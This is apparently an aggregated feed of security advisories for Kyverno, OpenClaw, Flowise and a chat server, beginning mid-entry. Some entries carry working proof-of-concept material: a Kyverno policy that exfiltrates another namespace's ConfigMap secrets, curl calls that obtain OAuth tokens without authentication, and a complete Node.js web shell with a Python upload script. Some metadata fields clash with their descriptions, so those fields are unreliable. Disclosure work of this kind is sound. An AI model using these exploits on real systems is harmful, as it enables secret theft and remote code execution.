| PATCH ValidatingWebhookConfiguration | **Allowed** |
| Read secrets (cluster-wide) | Denied (per-NS only) |

## Impact

An attacker who can create ClusterPolicy resources (or who compromises a service account with that permission) can steal Kyverno's admission controller token and use it to:

1. Hijack Kyverno's own mutating/validating webhooks
2. Intercept and modify every API request flowing through the cluster
3. Inject malicious containers, escalate privileges, exfiltrate secrets

The token is also sent to internal endpoints — `http://169.254.169.254/latest/meta-data/` works, so on cloud-hosted clusters (EKS, GKE, AKS) this also leaks cloud IAM credentials.

RBAC note: ClusterPolicy is a cluster-scoped resource, so creating one requires cluster-level RBAC. But in practice, platform teams often grant policy-write to team leads or automation pipelines. The auto-injection of the SA token is the unexpected part — nobody expects writing a policy to leak the controller's credentials.
الإصدارات المتأثرة
1.16.4
Vulnerability type
CWE-200 — Info Disclosure
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
References
https://github.com/kyverno/kyverno/commit/c2eab00033e635bda4e4efb58c1b472b41728bb6
https://github.com/kyverno/kyverno/commit/f70e8ac1e7acd2e3844f9553e4a884f07f953de0
https://github.com/kyverno/kyverno/security/advisories/GHSA-f9g8-6ppc-pqq4
Full description

### Summary

CVE-2026-22039 fixed cross-namespace privilege escalation in Kyverno's `apiCall` context by validating the `URLPath` field. However, the **ConfigMap context loader has the identical vulnerability** — the `configMap.namespace` field accepts any namespace with zero validation, allowing a namespace admin to read ConfigMaps from any namespace using Kyverno's privileged service account. This is a complete RBAC bypass in multi-tenant Kubernetes clusters.

### Details

**Root cause:** The CVE-2026-22039 fix in `pkg/engine/apicall/apiCall.go` (lines 73-83) validates that `URLPath` references only the policy's own namespace using regex. However, the ConfigMap context loader at `pkg/engine/context/loaders/configmap.go` performs **no namespace validation** on the `namespace` field.

**Code path comparison:**

| | CVE-2026-22039 (fixed) | This vulnerability (unfixed) |
|--|---|---|
| **Location** | `apiCall.URLPath` field | `configMap.namespace` field |
| **Code path** | `apicall.Fetch()` → namespace regex validation | `configmap.NewConfigMapLoader()` → no validation |
| **Root cause** | Variable substitution + missing validation | Same pattern, still unpatched |

**Exploit mechanism:**

1. Namespace admin creates a Kyverno Policy in their namespace (standard RBAC)
2. Policy uses `context.configMap.namespace: "victim-ns"` to reference another namespace
3. Kyverno's admission controller service account (has cluster-wide `view` role) fetches the ConfigMap
4. Policy mutates a trigger ConfigMap to exfiltrate the stolen data via annotations

**Affected code:** `pkg/engine/context/loaders/configmap.go` - `NewConfigMapLoader()` does not validate resolved namespace against policy namespace.

### PoC

Full reproduction (5 minutes on `kind`):

```bash
#!/bin/bash
# Setup: kind cluster + Kyverno v1.17.0
kind create cluster --name kyverno-poc --wait 60s
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno --namespace kyverno --create-namespace --version 3.7.0 --wait

# Create attacker and victim namespaces
kubectl create namespace attacker-ns
kubectl create namespace victim-ns

# Plant sensitive data in victim namespace
kubectl create configmap sensitive-config -n victim-ns \
  --from-literal=db-password="s3cr3t-p4ssw0rd" \
  --from-literal=api-key="AKIAIOSFODNN7EXAMPLE"

# Create namespace admin RBAC (standard multi-tenant setup)
kubectl create serviceaccount ns-admin -n attacker-ns
kubectl create rolebinding ns-admin-binding --clusterrole=admin \
  --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns
kubectl create role kyverno-policy-creator --verb=create,get,list \
  --resource=policies.kyverno.io --namespace=attacker-ns
kubectl create rolebinding kyverno-policy-binding --role=kyverno-policy-creator \
  --serviceaccount=attacker-ns:ns-admin --namespace=attacker-ns

# Verify namespace admin CANNOT directly access victim-ns
kubectl get configmap sensitive-config -n victim-ns \
  --as=system:serviceaccount:attacker-ns:ns-admin
# Error: Forbidden (expected)
```

**Exploit policy:**

```yaml
# Apply as namespace admin
apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: configmap-crossns-read
  namespace: attacker-ns
spec:
  rules:
    - name: steal-configmap
      match:
        any:
          - resources:
              kinds: [ConfigMap]
              names: ["trigger-cm"]
      context:
        - name: stolendata
          configMap:
            name: "sensitive-config"
            namespace: "victim-ns"  # <-- NO VALIDATION
      mutate:
        patchStrategicMerge:
          metadata:
            annotations:
              exfil-db-password: "{{ stolendata.data.\"db-password\" }}"
              exfil-api-key: "{{ stolendata.data.\"api-key\" }}"
```

**Trigger and exfiltrate:**

```bash
# Trigger policy (as namespace admin)
kubectl apply -f - <<EOF
apiVersion: v1
kind: ConfigMap
metadata:
  name: trigger-cm
  namespace: attacker-ns
data:
  innocent: "data"
EOF

# Read exfiltrated secrets
kubectl get configmap trigger-cm -n attacker-ns -o jsonpath='{.metadata.annotations}' \
  --as=system:serviceaccount:attacker-ns:ns-admin | python3 -m json.tool

# Output:
# {
#   "exfil-api-key": "AKIAIOSFODNN7EXAMPLE",
#   "exfil-db-password": "s3cr3t-p4ssw0rd"
# }
```

**Result:** Namespace admin successfully read secrets from `victim-ns` despite having NO RBAC access.

### Impact

**Severity: HIGH (CVSS 7.7)**

**Who is affected:**

- Any Kubernetes cluster running Kyverno v1.17.0 (and earlier) with namespace-scoped Policy creation enabled (default)
- Multi-tenant clusters where ConfigMaps contain sensitive data
- Azure Kubernetes Service (AKS) and other managed K8s using Kyverno

**Attack prerequisites:**

- Namespace admin privileges (standard RBAC in multi-tenant clusters)
- Ability to create Kyverno Policy resources (default for namespace admins)
- No cluster-admin required

**What can be exfiltrated:**

- Any ConfigMap from any namespace
- Common targets: database credentials, API keys, service configurations, application secrets stored in ConfigMaps

**Why this matters:**

- Namespace isolation is a fundamental Kubernetes security boundary
- Namespace admin is an expected, common RBAC level in production multi-tenant clusters
- Violates the principle of least privilege and breaks multi-tenancy guarantees

**Suggested fix:**

Apply the same namespace validation from `apicall.Fetch()` to `configmap.NewConfigMapLoader()`:

1. Pass `policyNamespace` to `NewConfigMapLoader()`
2. After variable substitution on `namespace`, validate resolved namespace == `policyNamespace`
3. Return error if validation fails

Also audit other context loaders (`globalReference`, `imageRegistry`, `variable`) for the same pattern.

**Tested versions:**

- Kyverno: v1.17.0 (latest, includes CVE-2026-22039 fix)
- Helm chart: 3.7.0
- Kubernetes: v1.35.0 (kind)

Affected versions
1.17.2
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Full description
In versions <8.4.0, <8.3.2, <8.2.2, <8.1.3, <8.0.4, <7.13.6, <7.12.7, <7.11.7, and <7.10.10, the endpoints /api/apps/logs and /api/apps/:id/logs have a typo in the required permission check, allowing authenticated users without the proper permissions to read apps-engine logs.
Affected versions
7.10.0 - 7.10.10
Vulnerability type
CWE-284 — CWE-284
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Full description

## Summary

Before OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread.

## Impact

A Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Affected versions: `<= 2026.4.1`
- Patched versions: `>= 2026.4.2`
- Latest published npm version: `2026.4.1`

## Fix Commit(s)

- `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist

## Release Process Note

The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.

OpenClaw thanks @AntAISecurityLab for reporting.

Vulnerability type
CWE-346 — CWE-346
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Full description

## Summary

Before OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates.

## Impact

Cross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Affected versions: `<= 2026.4.1`
- Patched versions: `>= 2026.4.2`
- Latest published npm version: `2026.4.1`

## Fix Commit(s)

- `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions

## Release Process Note

The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.

Thanks @D0ub1e-D for reporting.

Vulnerability type
CWE-706 — CWE-706
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
Full description

## Summary

Discord Slash Commands Bypass Group DM Channel Allowlist

## Current Maintainer Triage

- Status: narrow
- Normalized severity: moderate
- Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00

OpenClaw thanks @nexrin for reporting.

Affected versions
2026.3.31
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description

## Summary

The `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`.

## Impact

A write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended.

## Affected Component

`src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts`

## Fixed Versions

- Affected: `<= 2026.3.24`
- Patched: `>= 2026.3.28`
- Latest stable `2026.3.28` contains the fix.

## Fix

Fixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose defaults`).

Affected versions
2026.3.28
Vulnerability type
CWE-863 — Incorrect Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description

## Summary

Discord Component Interaction Misclassifies Group DM as Direct Message

## Current Maintainer Triage

- Status: narrow
- Normalized severity: low
- Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification.

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Latest published npm version: `2026.3.31`
- Vulnerable version range: `<=2026.3.28`
- Patched versions: `>= 2026.3.31`
- First stable tag containing the fix: `v2026.3.31`

## Fix Commit(s)

- `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00

## Release Process Note

- The fix is already present in released version `2026.3.31`.
- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.

Thanks @nexrin for reporting.

Affected versions
2026.3.31
Vulnerability type
CWE-351 — CWE-351
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Full description
OpenClaw before 2026.3.31 contains an authentication boundary vulnerability where Telegram legacy allowFrom migration incorrectly fans default-account trust into all named accounts. Attackers can exploit this trust propagation to bypass authentication controls and gain unauthorized access to named accounts.
Affected versions
2026.3.31
Vulnerability type
CWE-372 — CWE-372
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Full description

### Summary

The text-to-speech generation endpoint (`POST /api/v1/text-to-speech/generate`) is whitelisted (no auth) and accepts a `credentialId` directly in the request body. When called without a `chatflowId`, the endpoint uses the provided `credentialId` to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech.

### Root Cause

```typescript
// packages/server/src/controllers/text-to-speech/index.ts:58-64
} else {
    // Use TTS config from request body
    provider = bodyProvider
    credentialId = bodyCredentialId  // ← attacker-controlled credential ID
    voice = bodyVoice
    model = bodyModel
}
```

### Docker Validation

`POST /api/v1/text-to-speech/generate` with arbitrary `credentialId` in body: endpoint processes request, sends SSE `tts_start` event, only fails when credential doesn't exist — proves code path runs without authentication.

### Impact

- Use victim's API keys (OpenAI, ElevenLabs, Azure, Google) without authorization
- Burn API credits on the victim's account
- Generate unlimited speech content at victim's expense
- Combined with credential ID leak from Finding 2, this is trivially exploitable

### Suggested Fix

Remove the TTS endpoint from `WHITELIST_URLS` or validate that the credential belongs to the chatflow being used:

```typescript
// Only allow credentialId when it matches the chatflow's TTS configuration
if (!chatflowId) {
    return res.status(401).json({ message: 'Authentication required' })
}
```

---

## References

- `packages/server/src/controllers/text-to-speech/index.ts` lines 10-162
- `packages/server/src/utils/constants.ts` line 41 (whitelist entry)

## Credits

- Shinobi Security - https://github.com/shinobisecurity

Affected versions
3.1.0
Vulnerability type
CWE-639 — IDOR
CVSS Vector
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description

### Summary

The `GET /api/v1/public-chatflows/:id` endpoint returns the full chatflow object **without sanitization** for public chatflows. Docker validation revealed this is worse than initially assessed: the `sanitizeFlowDataForPublicEndpoint` function does NOT exist in the released v3.0.13 Docker image. Both `public-chatflows` AND `public-chatbotConfig` return completely raw flowData including credential IDs, plaintext API keys, and password-type fields.

### Root Cause

```typescript
// packages/server/src/controllers/chatflows/index.ts:218-220
const chatflow = await chatflowsService.getChatflowById(req.params.id)
if (!chatflow) return res.status(StatusCodes.NOT_FOUND).json(...)
if (chatflow.isPublic) return res.status(StatusCodes.OK).json(chatflow)  // ← NO sanitization!
```

### Docker Validation (v3.0.13)

Created public chatflow with credential IDs and passwords in flowData:

```json
{
  "flowData": "{\"nodes\":[{\"data\":{\"credential\":\"e92a39bf-...\",\"inputs\":{\"password\":\"sk-supersecretkey123\",\"apiKey\":\"should-not-leak\"}}}]}"
}
```

The `sanitizeFlowDataForPublicEndpoint` function only exists in unreleased HEAD, and even there, only `public-chatbotConfig` calls it — `public-chatflows` never does.

### Impact

- **Credential IDs** leaked — enables OAuth2 token theft chain (Finding 1)
- **Plaintext API keys and passwords** leaked — direct third-party account compromise
- **Node configurations** leaked — reveals internal architecture and endpoint URLs
- Both `public-chatflows` and `public-chatbotConfig` are affected in the released version

### Suggested Fix

Apply sanitization to both public endpoints:

```typescript
const sanitized = sanitizeFlowDataForPublicEndpoint(chatflow)
return res.status(StatusCodes.OK).json(sanitized)
```

Ensure the sanitization function strips all `credential`, `password`, `apiKey`, and `secretKey` fields from `flowData`.

---

## References

- `packages/server/src/controllers/chatflows/index.ts` lines 209-236
- `packages/server/src/utils/sanitizeFlowData.ts` lines 11-34 (exists only in unreleased HEAD)

## Credits

- Shinobi Security - https://github.com/shinobisecurity

Affected versions
3.1.0
Vulnerability type
CWE-200 — Info Disclosure
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description

### Summary

Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication.

### Details

Flowise is designed to allow public chatflows to be accessed by unauthenticated end users via public URLs or embedded widgets. As a result, `chatflowId` values are intentionally exposed to unauthenticated clients and must not be treated as secrets.

However, the endpoint `GET /api/v1/public-chatbotConfig/<chatflowId>` returns internal `flowData` without authentication. The returned `flowData` includes workflow node definitions containing OAuth credential identifiers (`credential` field).

Separately, the endpoint `POST /api/v1/oauth2-credential/refresh/<credentialId>` allows OAuth 2.0 tokens to be refreshed without authentication or authorization checks.

Because credential identifiers can be obtained from the unauthenticated public chatflow configuration endpoint, these two behaviors can be combined to allow unauthenticated OAuth 2.0 access token disclosure.

### PoC

**Prerequisites**

- Self-hosted Flowise instance
- A public chatflow configured with an OAuth 2.0 credential (e.g., Gmail OAuth2)

#### Step 1: Obtain `chatflowId`

The `chatflowId` is exposed to unauthenticated users via public chatflow URLs, embedded widgets, or browser network requests when accessing a public chatflow.

Example: `d37b9812-72c1-4c64-b152-665f307f755e`

#### Step 2: Retrieve internal `flowData` without authentication

```bash
curl -s \
  http://localhost:3000/api/v1/public-chatbotConfig/d37b9812-72c1-4c64-b152-665f307f755e
```

The response includes flowData containing an OAuth credential identifier, for example:

```
"credential": "6efe0e20-ba6f-4fbb-9960-658feffa0542"
```

#### Step 3: Refresh OAuth 2.0 token without authentication

```bash
curl -X POST \
  http://localhost:3000/api/v1/oauth2-credential/refresh/6efe0e20-ba6f-4fbb-9960-658feffa0542
```

The response returns valid OAuth 2.0 access token data, including an `access_token`.

### Impact

An unauthenticated attacker can obtain OAuth 2.0 access tokens for third-party services configured in Flowise, potentially leading to unauthorized data access, API abuse, or account compromise.

This vulnerability affects self-hosted deployments because public chatflows are commonly exposed to the internet and require unauthenticated access by design. Treating `chatflowId` as a secret does not mitigate the issue.

Affected versions
3.1.0
Vulnerability type
CWE-306 — Auth Bypass
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Full description

### Summary

In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).

### Details

This is a bypass of [GHSA-35g6-rrw3-v6xc](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-35g6-rrw3-v6xc) (CVE-2025-61687).

The Chatflow file upload settings do not properly validate MIME types. An attacker can add the `application/javascript` MIME type when updating a Chatflow, allowing .js files to be uploaded.

JavaScript files are not listed as an option for file upload types within the web user interface.

### PoC

#### shell.js (Node.js Web Shell)

```
const { exec } = require('child_process');
const http = require('http');

const server = http.createServer((req, res) => {
  const url = new URL(req.url, 'http://localhost');
  const cmd = url.searchParams.get('cmd');

  if (cmd) {
    console.log(`Executing: ${cmd}`);
    exec(cmd, (error, stdout, stderr) => {
      res.writeHead(200, {'Content-Type': 'text/plain'});
      if (error) {
        res.end(`Error: ${error.message}\n${stderr || ''}`);
      } else {
        res.end(stdout || 'Command executed successfully');
      }
    });
  } else {
    res.writeHead(200, {'Content-Type': 'text/html'});
    res.end(`
      <h1>Node.js Web Shell</h1>
      <p>Use ?cmd=command to execute</p>
      <p>Example: ?cmd=id</p>
    `);
  }
});

const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
  console.log(`Shell running on port ${PORT}`);
  console.log(`Access: http://localhost:${PORT}?cmd=id`);
});
```

#### Python Upload Script

```
import requests
import uuid

TARGET_URL = "http://192.168.236.131:3000"
CHATFLOW_ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2"
cookie_str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz_Ewwf-YXzmTPwoOEHG_g; connect.sid=s%3Avwp7SDKi02Mzu_nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y'
js_mime_type = 'application/javascript'
CHAT_ID = str(uuid.uuid4())

def configure_chatflow_uploadfile():
    url = f"{TARGET_URL}/api/v1/chatflows/{CHATFLOW_ID}"
    headers = {'Cookie': cookie_str, 'x-request-from': 'internal'}
    chatbot_configdata = {"chatbotConfig":'{\"fullFileUpload\":{\"status\":true,\"allowedUploadFileTypes\":\"' + js_mime_type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation\",\"pdfFile\":{\"usage\":\"perPage\",\"legacyBuild\":false}}}'}
    r = requests.put(url, headers=headers, json = chatbot_configdata)
    if js_mime_type in r.text:
        print("[+] Enabled .js file uploads")
    else:
        print("[-] Failed to enable .js file uploads")

def upload_shell():
    url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}"
    headers = {'Cookie': cookie_str}
    files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
    r = requests.post(url, headers=headers, files=files)
    if r.status_code == 200:
        print("[+] Upload success")
        print(r.text)
    else:
        print(f"[-] Upload failed ({r.status_code})")
        print(r.text)

if __name__ == "__main__":
    configure_chatflow_uploadfile()
    upload_shell()
```

### Impact

An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

Affected versions
3.1.0
Vulnerability type
CWE-434 — Unrestricted Upload
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N